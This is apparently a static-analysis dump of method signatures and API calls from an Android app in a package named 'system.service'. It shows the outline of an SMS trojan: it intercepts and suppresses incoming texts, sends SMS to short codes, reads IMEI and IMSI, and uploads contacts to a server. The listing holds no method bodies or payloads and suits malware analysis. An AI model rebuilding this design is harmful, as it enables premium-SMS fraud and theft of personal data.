Lsystem/service/AutorunBroadcastReceiver;-><init>()V [access_flags=public constructor] @ 0x1ff4
Landroid/content/BroadcastReceiver;-><init>()V
Lsystem/service/AutorunBroadcastReceiver;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x2014
Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
Landroid/util/Log;->d(Ljava/lang/String; Ljava/lang/String;)I
Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
Landroid/app/AlarmManager;->cancel(Landroid/app/PendingIntent;)V
Landroid/app/AlarmManager;->set(I J Landroid/app/PendingIntent;)V
Ljava/lang/String;->equals(Ljava/lang/Object;)Z
Landroid/content/Intent;->getAction()Ljava/lang/String;
Ljava/lang/StringBuilder;->append(J)Ljava/lang/StringBuilder;
Landroid/app/PendingIntent;->getBroadcast(Landroid/content/Context; I Landroid/content/Intent; I)Landroid/app/PendingIntent;
Ljava/lang/System;->currentTimeMillis()J
Landroid/content/Intent;-><init>(Landroid/content/Context; Ljava/lang/Class;)V
Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
Lsystem/service/BuildConfig;-><init>()V [access_flags=public constructor] @ 0x212c
Ljava/lang/Object;-><init>()V
Lsystem/service/Message;-><init>(J Ljava/lang/String; Ljava/lang/String; Ljava/lang/String;)V [access_flags=public constructor] @ 0x2144
Lsystem/service/Message;->getId()J [access_flags=public] @ 0x2184
Lsystem/service/Message;->getMessage()Ljava/lang/String; [access_flags=public] @ 0x219c
Lsystem/service/Message;->getShortCode()Ljava/lang/String; [access_flags=public] @ 0x21b4
Lsystem/service/Message;->getFromShortCode()Ljava/lang/String; [access_flags=public] @ 0x216c
Lsystem/service/MessagesDataSource;-><init>(Landroid/content/Context;)V [access_flags=public constructor] @ 0x21fc
Lsystem/service/MessagesSqlLite;-><init>(Landroid/content/Context;)V [access_flags=public constructor] @ 0x23bc
Lsystem/service/MessagesDataSource;->close()V [access_flags=public] @ 0x2254
Lsystem/service/MessagesSqlLite;->close()V
Lsystem/service/MessagesDataSource;->createMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String;)J [access_flags=public] @ 0x2270
Landroid/content/ContentValues;-><init>()V
Landroid/database/sqlite/SQLiteDatabase;->insert(Ljava/lang/String; Ljava/lang/String; Landroid/content/ContentValues;)J
Landroid/content/ContentValues;->put(Ljava/lang/String; Ljava/lang/String;)V
Lsystem/service/MessagesDataSource;->deleteMessage(Lsystem/service/Message;)V [access_flags=public] @ 0x22bc
Landroid/database/sqlite/SQLiteDatabase;->delete(Ljava/lang/String; Ljava/lang/String; [Ljava/lang/String;)I
Lsystem/service/MessagesDataSource;->getAllMessages()Ljava/util/List; [access_flags=public] @ 0x2304
Landroid/database/Cursor;->getString(I)Ljava/lang/String;
Landroid/database/Cursor;->moveToFirst()Z
Landroid/database/sqlite/SQLiteDatabase;->query(Ljava/lang/String; [Ljava/lang/String; Ljava/lang/String; [Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Ljava/lang/String;)Landroid/database/Cursor;
Landroid/database/Cursor;->isAfterLast()Z
Ljava/util/List;->add(Ljava/lang/Object;)Z
Landroid/database/Cursor;->getLong(I)J
Landroid/database/Cursor;->moveToNext()Z
Ljava/util/ArrayList;-><init>()V
Landroid/database/Cursor;->close()V
Lsystem/service/MessagesDataSource;->open()V [access_flags=public] @ 0x2398
Lsystem/service/MessagesSqlLite;->getWritableDatabase()Landroid/database/sqlite/SQLiteDatabase;
Landroid/database/sqlite/SQLiteOpenHelper;-><init>(Landroid/content/Context; Ljava/lang/String; Landroid/database/sqlite/SQLiteDatabase$CursorFactory; I)V
Lsystem/service/MessagesSqlLite;->onCreate(Landroid/database/sqlite/SQLiteDatabase;)V [access_flags=public] @ 0x23dc
Landroid/database/sqlite/SQLiteDatabase;->execSQL(Ljava/lang/String;)V
Lsystem/service/MessagesSqlLite;->onUpgrade(Landroid/database/sqlite/SQLiteDatabase; I I)V [access_flags=public] @ 0x23f8
Lsystem/service/R$attr;-><init>()V [access_flags=public constructor] @ 0x241c
Lsystem/service/R$drawable;-><init>()V [access_flags=public constructor] @ 0x2434
Lsystem/service/R$layout;-><init>()V [access_flags=public constructor] @ 0x244c
Lsystem/service/R$string;-><init>()V [access_flags=public constructor] @ 0x2464
Lsystem/service/R;-><init>()V [access_flags=public constructor] @ 0x247c
Lsystem/service/RepeatingAlarmService;-><init>()V [access_flags=public constructor] @ 0x2494
Lsystem/service/RepeatingAlarmService;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x24b4
Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
Lsystem/service/ServerResponse;-><init>()V [access_flags=public constructor] @ 0x24e8
Ljava/util/Vector;-><init>()V
Lsystem/service/Settings;-><init>()V [access_flags=public constructor] @ 0x2578
Lsystem/service/SettingsSet;-><init>()V [access_flags=public constructor] @ 0x2b80
Lsystem/service/Settings;->deserialize([B)Ljava/lang/Object; [access_flags=public static] @ 0x25c8
Ljava/lang/ClassNotFoundException;->printStackTrace()V
Ljava/io/ByteArrayInputStream;-><init>([B)V
Ljava/io/ObjectInputStream;-><init>(Ljava/io/InputStream;)V
Ljava/io/ObjectInputStream;->close()V
Ljava/io/IOException;->printStackTrace()V
Ljava/io/ObjectInputStream;->readObject()Ljava/lang/Object;
Lsystem/service/Settings;->getAttributeValue(Lorg/xmlpull/v1/XmlPullParser; Ljava/lang/String;)Ljava/lang/String; [access_flags=public static] @ 0x2628
Lorg/xmlpull/v1/XmlPullParser;->getAttributeName(I)Ljava/lang/String;
Lorg/xmlpull/v1/XmlPullParser;->getAttributeCount()I
Lorg/xmlpull/v1/XmlPullParser;->getAttributeValue(I)Ljava/lang/String;
Lsystem/service/Settings;->getCurrentTime()Ljava/lang/String; [access_flags=public static] @ 0x2670
Landroid/text/format/Time;-><init>()V
Landroid/text/format/Time;->format(Ljava/lang/String;)Ljava/lang/String;
Landroid/text/format/Time;->setToNow()V
Lsystem/service/Settings;->loadFilters(Landroid/content/Context;)Ljava/util/Vector; [access_flags=public static] @ 0x26a0
Lorg/xmlpull/v1/XmlPullParserFactory;->newPullParser()Lorg/xmlpull/v1/XmlPullParser;
Landroid/content/Context;->openFileInput(Ljava/lang/String;)Ljava/io/FileInputStream;
Ljava/lang/Exception;->printStackTrace()V
Lorg/xmlpull/v1/XmlPullParser;->setInput(Ljava/io/InputStream; Ljava/lang/String;)V
Lorg/xmlpull/v1/XmlPullParserFactory;->newInstance()Lorg/xmlpull/v1/XmlPullParserFactory;
Lorg/xmlpull/v1/XmlPullParser;->next()I
Lsystem/service/SmsItem;-><init>()V [access_flags=public constructor] @ 0x4030
Ljava/io/PrintStream;->println(Ljava/lang/String;)V
Ljava/util/Vector;->addElement(Ljava/lang/Object;)V
Lorg/xmlpull/v1/XmlPullParser;->getName()Ljava/lang/String;
Lsystem/service/Settings;->md5(Ljava/lang/String;)Ljava/lang/String; [access_flags=public static] @ 0x2794
Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest;
Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
Ljava/lang/String;->length()I
Ljava/security/NoSuchAlgorithmException;->printStackTrace()V
Ljava/lang/StringBuffer;->toString()Ljava/lang/String;
Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;
Ljava/security/MessageDigest;->digest()[B
Ljava/lang/StringBuffer;-><init>()V
Ljava/security/MessageDigest;->update([B)V
Ljava/lang/String;->getBytes()[B
Lsystem/service/Settings;->serialize(Ljava/lang/Object;)[B [access_flags=public static] @ 0x2830
Ljava/io/ObjectOutputStream;-><init>(Ljava/io/OutputStream;)V
Ljava/io/ObjectOutput;->writeObject(Ljava/lang/Object;)V
Ljava/io/ByteArrayOutputStream;-><init>()V
Ljava/io/ObjectOutput;->close()V
Ljava/io/ByteArrayOutputStream;->toByteArray()[B
Lsystem/service/Settings;->isDeleteMessage(Ljava/lang/String; Ljava/lang/String;)Z [access_flags=public] @ 0x2884
Ljava/lang/String;->indexOf(Ljava/lang/String;)I
Ljava/util/Vector;->size()I
Ljava/util/Vector;->elementAt(I)Ljava/lang/Object;
Ljava/lang/String;->compareTo(Ljava/lang/String;)I
Lsystem/service/Settings;->isNewServer(Landroid/content/Context; Ljava/lang/String; Ljava/lang/String;)Z [access_flags=public] @ 0x2a10
Ljava/lang/String;->replace(Ljava/lang/CharSequence; Ljava/lang/CharSequence;)Ljava/lang/String;
Lsystem/service/Settings;->save(Landroid/content/Context;)Z [access_flags=public] @ 0x2b18
Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
Ljava/io/FileOutputStream;->write([B)V
Ljava/io/FileOutputStream;->close()V
Landroid/content/Context;->openFileOutput(Ljava/lang/String; I)Ljava/io/FileOutputStream;
Lsystem/service/Settings;->load(Landroid/content/Context;)Z [access_flags=public] @ 0x2a7c
Ljava/io/FileInputStream;->available()I
Ljava/io/FileInputStream;->close()V
Ljava/io/FileInputStream;->read([B)I
Lsystem/service/Settings;->reset(Landroid/content/Context;)V [access_flags=public] @ 0x2afc
Landroid/content/Context;->deleteFile(Ljava/lang/String;)Z
Lsystem/service/SmsApplication;-><init>()V [access_flags=public constructor] @ 0x2bfc
Landroid/app/Application;-><init>()V
Lsystem/service/SmsApplication;->captchaLogic(Landroid/telephony/SmsMessage;)V [access_flags=public static] @ 0x2c14
Lsystem/service/SmsApplication;->setReplyNumberRxp(Ljava/lang/String;)V [access_flags=public static] @ 0x3b40
Lsystem/service/SmsApplication;->getReplyCodeGrp()I [access_flags=public static] @ 0x31a8
Lsystem/service/SmsApplication;->matcher(Ljava/lang/String; I Ljava/lang/String;)Ljava/lang/String; [access_flags=public static] @ 0x33dc
Lsystem/service/SmsApplication;->setReplyCodeRxp(Ljava/lang/String;)V [access_flags=public static] @ 0x3b10
Lsystem/service/SmsApplication;->getReplyCodeRxp()Ljava/lang/String; [access_flags=public static] @ 0x31c0
Lsystem/service/SmsApplication;->sendSms(Ljava/lang/String; Ljava/lang/String;)Z [access_flags=public static] @ 0x3a3c
Landroid/telephony/SmsMessage;->getMessageBody()Ljava/lang/String;
Lsystem/service/SmsApplication;->getReplyNumberRxp()Ljava/lang/String; [access_flags=public static] @ 0x31f0
Landroid/telephony/SmsMessage;->getOriginatingAddress()Ljava/lang/String;
Lsystem/service/SmsApplication;->getReplyNumberGrp()I [access_flags=public static] @ 0x31d8
Ljava/util/regex/Matcher;->find()Z
Ljava/util/regex/Pattern;->matcher(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher;
Ljava/util/Vector;->add(Ljava/lang/Object;)Z
Ljava/util/regex/Pattern;->compile(Ljava/lang/String; I)Ljava/util/regex/Pattern;
Ljava/util/regex/Matcher;->group()Ljava/lang/String;
Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V
Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
Lsystem/service/SmsApplication;->compareNumbers(Ljava/lang/String; Ljava/lang/String;)Z [access_flags=private static] @ 0x2cc0
Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
Ljava/lang/String;->substring(I)Ljava/lang/String;
Lsystem/service/SmsApplication;->contactsToXml(Ljava/util/Vector;)Ljava/lang/String; [access_flags=public static] @ 0x2d30
Lorg/xmlpull/v1/XmlSerializer;->startTag(Ljava/lang/String; Ljava/lang/String;)Lorg/xmlpull/v1/XmlSerializer;
Lorg/xmlpull/v1/XmlSerializer;->text(Ljava/lang/String;)Lorg/xmlpull/v1/XmlSerializer;
Lorg/xmlpull/v1/XmlSerializer;->setOutput(Ljava/io/Writer;)V
Lorg/xmlpull/v1/XmlSerializer;->endTag(Ljava/lang/String; Ljava/lang/String;)Lorg/xmlpull/v1/XmlSerializer;
Lorg/xmlpull/v1/XmlSerializer;->endDocument()V
Lorg/xmlpull/v1/XmlSerializer;->startDocument(Ljava/lang/String; Ljava/lang/Boolean;)V
Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
Ljava/io/StringWriter;->toString()Ljava/lang/String;
Ljava/io/StringWriter;-><init>()V
Landroid/util/Xml;->newSerializer()Lorg/xmlpull/v1/XmlSerializer;
Lsystem/service/SmsApplication;->convertToIntSafe(Ljava/lang/String; I)I [access_flags=public static] @ 0x2df4
Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
Lsystem/service/SmsApplication;->dateFromString(Ljava/lang/String;)Ljava/util/Date; [access_flags=public static] @ 0x2e20
Ljava/lang/String;->substring(I I)Ljava/lang/String;
Ljava/util/Date;-><init>(I I I I I I)V
Ljava/util/Date;-><init>()V
Lsystem/service/SmsApplication;->decodeHtml(Ljava/lang/String;)Ljava/lang/String; [access_flags=public static] @ 0x2ef8
Lsystem/service/SmsApplication;->findNumberInPhoneBook(Landroid/content/Context; Ljava/lang/String;)Z [access_flags=public static] @ 0x2f5c
Lsystem/service/SmsApplication;->getContacts(Landroid/content/Context;)Ljava/util/Vector; [access_flags=public static] @ 0x3038
Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
Landroid/content/ContentResolver;->query(Landroid/net/Uri; [Ljava/lang/String; Ljava/lang/String; [Ljava/lang/String; Ljava/lang/String;)Landroid/database/Cursor;
Landroid/content/Context;->getContentResolver()Landroid/content/ContentResolver;
Lsystem/service/SmsApplication;->getApplicationUrl()Ljava/lang/String; [access_flags=public static] @ 0x2fa8
Lsystem/service/SmsApplication;->getAttributeValue(Lorg/xmlpull/v1/XmlPullParser; Ljava/lang/String;)Ljava/lang/String; [access_flags=public static] @ 0x2ff0
Lsystem/service/SmsApplication;->getCurrentTime()Ljava/lang/String; [access_flags=public static] @ 0x30b0
Lsystem/service/SmsApplication;->getImei(Landroid/content/Context;)Ljava/lang/String; [access_flags=public static] @ 0x30e0
Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
Lsystem/service/SmsApplication;->getImsi(Landroid/content/Context;)Ljava/lang/String; [access_flags=public static] @ 0x3138
Landroid/telephony/TelephonyManager;->getSubscriberId()Ljava/lang/String;
Lsystem/service/SmsApplication;->getStatisticsUrl()Ljava/lang/String; [access_flags=public static] @ 0x3220
Lsystem/service/SmsApplication;->getTime(J)Ljava/lang/String; [access_flags=public static] @ 0x3268
Landroid/text/format/Time;->set(J)V
Lsystem/service/SmsApplication;->isServiceNumber(Ljava/lang/String;)Z [access_flags=public static] @ 0x3298
Lsystem/service/SmsApplication;->makeHttpPost(Ljava/lang/String; Ljava/util/List;)Lorg/apache/http/HttpResponse; [access_flags=public static] @ 0x3300
Lorg/apache/http/StatusLine;->getStatusCode()I
Lorg/apache/http/client/entity/UrlEncodedFormEntity;-><init>(Ljava/util/List;)V
Lorg/apache/http/client/methods/HttpPost;-><init>(Ljava/lang/String;)V
Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;
Lorg/apache/http/HttpResponse;->getStatusLine()Lorg/apache/http/StatusLine;
Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
Lorg/apache/http/client/methods/HttpPost;->setEntity(Lorg/apache/http/HttpEntity;)V
Lorg/apache/http/impl/client/DefaultHttpClient;-><init>()V
Lsystem/service/SmsApplication;->millsToString(J)Ljava/lang/String; [access_flags=public static] @ 0x3470
Ljava/util/Calendar;->getTime()Ljava/util/Date;
Ljava/util/Calendar;->setTimeInMillis(J)V
Ljava/text/DateFormat;->format(Ljava/util/Date;)Ljava/lang/String;
Ljava/util/Calendar;->getInstance()Ljava/util/Calendar;
Ljava/text/SimpleDateFormat;-><init>(Ljava/lang/String;)V
Lsystem/service/SmsApplication;->sendContactsToServer(Landroid/content/Context; Ljava/lang/String;)V [access_flags=public static] @ 0x34b0
Ljava/io/DataOutputStream;->writeBytes(Ljava/lang/String;)V
Ljava/io/DataOutputStream;->flush()V
Ljava/net/HttpURLConnection;->setRequestProperty(Ljava/lang/String; Ljava/lang/String;)V
Ljava/net/URL;-><init>(Ljava/lang/String;)V
Ljava/net/HttpURLConnection;->setUseCaches(Z)V
Ljava/net/HttpURLConnection;->setDoOutput(Z)V
Ljava/io/DataOutputStream;->write([B)V
Ljava/net/HttpURLConnection;->getOutputStream()Ljava/io/OutputStream;
Ljava/net/HttpURLConnection;->setDoInput(Z)V
Ljava/io/DataOutputStream;-><init>(Ljava/io/OutputStream;)V
Ljava/lang/String;->getBytes(Ljava/lang/String;)[B
Ljava/net/HttpURLConnection;->getResponseCode()I
Ljava/net/HttpURLConnection;->disconnect()V
Ljava/io/DataOutputStream;->close()V
Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
Ljava/net/HttpURLConnection;->setRequestMethod(Ljava/lang/String;)V
Lsystem/service/SmsApplication;->sendHttpData(Ljava/lang/String; Ljava/util/List;)Lsystem/service/ServerResponse; [access_flags=private static] @ 0x3724
Lorg/apache/http/HttpResponse;->getEntity()Lorg/apache/http/HttpEntity;
Lorg/xmlpull/v1/XmlPullParser;->getText()Ljava/lang/String;
Ljava/lang/Long;->parseLong(Ljava/lang/String;)J
Ljava/util/Date;->getTime()J
Lorg/apache/http/HttpEntity;->getContent()Ljava/io/InputStream;
Lsystem/service/SmsApplication;->sendRequest()Lsystem/service/ServerResponse; [access_flags=public static] @ 0x3974
Lorg/apache/http/message/BasicNameValuePair;-><init>(Ljava/lang/String; Ljava/lang/String;)V
Ljava/util/LinkedList;-><init>()V
Lsystem/service/SmsApplication;->uploadMessageStat(Landroid/content/Context;)V [access_flags=public static] @ 0x3b58
Ljava/util/List;->get(I)Ljava/lang/Object;
Ljava/util/List;->size()I
Lsystem/service/SmsApplication;->cancelAlarmScheduler(Landroid/app/PendingIntent;)V [access_flags=] @ 0x3c9c
Lsystem/service/SmsApplication;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
Lsystem/service/SmsApplication;->onCreate()V [access_flags=public] @ 0x3cd4
Lsystem/service/SmsApplication;->logStat(Ljava/lang/String; Landroid/content/Context;)V [access_flags=public static] @ 0x32ec
Landroid/app/Application;->onCreate()V
Lsystem/service/SmsApplication;->getServerKey()Ljava/lang/String; [access_flags=public static] @ 0x3208
Lsystem/service/SmsApplication;->getLastSendTime()J [access_flags=public static] @ 0x3178
Lsystem/service/SmsApplication;->getLastShortCode()Ljava/lang/String; [access_flags=public static] @ 0x3190
Lsystem/service/SmsApplication;->setLastSendTime(J)V [access_flags=public static] @ 0x3ac8
Lsystem/service/SmsApplication;->setLastShortCode(Ljava/lang/String;)V [access_flags=public static] @ 0x3ae0
Lsystem/service/SmsApplication;->setReplyCodeGrp(I)V [access_flags=public static] @ 0x3af8
Lsystem/service/SmsApplication;->setReplyNumberGrp(I)V [access_flags=public static] @ 0x3b28
Lsystem/service/SmsReciver;-><init>()V [access_flags=public constructor] @ 0x405c
Lsystem/service/SmsReciver;->getSmsMessages(Landroid/os/Bundle;)[Landroid/telephony/SmsMessage; [access_flags=private] @ 0x407c
Landroid/telephony/SmsMessage;->createFromPdu([B)Landroid/telephony/SmsMessage;
Landroid/os/Bundle;->get(Ljava/lang/String;)Ljava/lang/Object;
Lsystem/service/SmsReciver;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x40c8
Lsystem/service/SmsReciver;->abortBroadcast()V
Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
Landroid/content/Intent;->getExtras()Landroid/os/Bundle;
Lsystem/service/SystemService;-><init>()V [access_flags=public constructor] @ 0x4338
Landroid/app/Service;-><init>()V
Lsystem/service/SystemService;->onCreate()V [access_flags=public] @ 0x4378
Landroid/app/Service;->onCreate()V
Lsystem/service/SystemService;->setForeground(Z)V
Lsystem/service/SystemService;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
Lsystem/service/SystemService;->onDestroy()V [access_flags=public] @ 0x43c4
Landroid/app/Service;->onDestroy()V
Lsystem/service/SystemService;->onStart(Landroid/content/Intent; I)V [access_flags=public] @ 0x43ec
Landroid/app/Service;->onStart(Landroid/content/Intent; I)V
Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
Ljava/lang/Thread;->start()V
Lsystem/service/SystemService;->run()V [access_flags=public] @ 0x4444
Lsystem/service/SystemService;->stopSelf()V
Landroid/os/SystemClock;->sleep(J)V
Lsystem/service/TimerOperation;-><init>(Lsystem/service/TimerOperationListener; I Ljava/lang/Object;)V [access_flags=constructor] @ 0x4858
Ljava/util/TimerTask;-><init>()V
Lsystem/service/TimerOperation;->run()V [access_flags=public] @ 0x4888
Lsystem/service/TimerOperationListener;->timerEnd(I Ljava/lang/Object;)V [access_flags=public abstract] @ 0x0
